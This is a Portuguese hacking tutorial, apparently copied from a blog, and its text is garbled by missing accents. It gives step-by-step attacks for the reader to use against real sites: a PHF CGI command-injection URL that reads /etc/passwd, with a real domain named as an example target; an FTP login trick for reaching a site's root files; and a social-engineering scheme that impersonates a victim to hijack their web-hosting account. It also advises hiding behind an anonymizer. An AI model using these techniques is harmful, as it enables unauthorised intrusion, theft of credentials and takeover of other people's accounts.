Invadir Sites Vulnerveis( Bsico )

Ataque via browser: http://hackersofbrazil.blogspot.com.br/p/invadir-sitesvulneraveis.html

O ataque via browser um dos ataques mais fceis de executar, mas no da nem 50% de
sucessos.
Vou
tentar
explicar
como
voc
usa
esse
mtodo:
Primeiramente voc tem que entender o que est fazendo, no adianta selecionar a dica aperta
CTRL+C e colocar no navegador achando que ele vai fazer tudo para voc no, entenda:
Bom, como j sabe o geralmente o arquivo passwd o que contm os passwords
encripitados (se voc no sabe ainda, aprenda um pouco sobre o UNIX) , existem vrios
servidores que s Root pode entrar no diretrio /etc, para outros usurios bloqueado o
acesso a esse diretrio, mas existe um mtodo para tentar pegar esse arquivo. No diretrio /cgibin do Web Server (Pagina WEB do servidor) geralmente contm um arquivos chamdo PHF. O
PHF permite aos usurios ganhar acesso remoto para arquivos (inclusive o /etc/passwd). Ento
atravs desse arquivo voc pode tentar pegar a lista de passwords, muito simples, apenas
digite
essa
URL
no
seu
browser:
http://sitevuneravel/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Ento substitua o sitevuneravel pelo endereo do servidor que voc quer
hackear.
Ex:http://www.tba.com.br/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Obs:
Antes de tentar qualquer ataque no custa nada usar o anonymizer , mais lembre-se nunca ,
nunca mesmo apague arquivos ou comandos.
Invadir Site por FTP:
vai no iniciar --> executar --> digite cmd --> e d ENTER
vai aparecer uma tela preta la vc coloca FTP e da enter!!
depois vc escreve "OPEN"(sem aspas). ae vai aparecer "para"(sem aspas) (ae vc escreve ftp.
(qual quer site que vc quer hackiar) obs:tira o www e substitua por FTP!!!
Obs:
naum sao todos os sites que dao para fazer isso!!
ae vai aparecer conectado ao xxx.xxx.xxx,
vai aparecer LOGIN --> d ENTER,
depois que vc der enter vai aparecer SENHA --> d ENTER
vai aparecer que deu falha no logon naum se preocupe pq sempre aparece isso.

ae vc escreve: quote user ftp --> e da ENTER

depois escreve: quote cwd~root e da ENTER
depois: quote pass ftp da ENTER
e depois para acabar escreva:dir e da enter
depois disso se vc kiser ver se vc consiguiU hackiar vc vai na url e escreve assim
ftp.ositequevcpois.com e da enter ae vc vai ve as pastas do site.
Obs:
naum jogue nd fora pq quem faz isso cracker no hacker!

Free Web Sites

O servio de Hosting Gratis de WebPages feito por empresas como a Tripod and Geocities,
que d espao de graa e ganha dinheiro com propaganda. H maneiras de hackear essas
empresas e ter acesso todas as senhas/usernames, mas algo que seria complexo para a
maioria das pessoas. Esse mtodo que vai ser explicado simples engenharia social, o que no
muito dificil de se fazer. Ento, no se ache um Hacker de Elite s porque vc zuou a webpage
de uma pobre pessoa que apenas esqueceu algumas informaes pessoais na prpria Page.
Tudo que vc tem que fazer abrir uma conta num servio de e-mail (ex.:Hotmail) e escolher uma
vtima. Vc precisar achar a data de nascimento, o nome, e o e-mail antigo da pessoa, e se
possivel, o endereo dela. Resumindo Consiga o MAXIMO de info que vc puder sobre ela.
Todas essas empresas tm um servio de verificao para pessoas que perderam a password
da sua Page. Quando vc tiver o maximo de informaes sobre a pessoa, mande um e-mail para
a empresa dizendo que vc mudou de e-mail. ESPERE duas semanas e mande outro. S que
nesse, diga que vc perdeu a sua password. Na maioria das vezes eles te mandam um e-mail de
volta, dizendo que vc precisa confirmar alguns dados pessoais seus, como a data de
nascimento
ou
endereo.
Tudo o que vc tem de fazer mandar todas as informaes que vc conseguiu, e esperar a
password
chegar
fresquinha
no
seu
e-mail.
Por outro lado, companhias como a Geocities so muito ocupadas para ficar respondendo emails de perda de password, ento eles fizeram uma pagina onde membros podem pegar suas
passwordz
de
volta.
Cdigo:
http://www.geocities.com/help/pass_form.html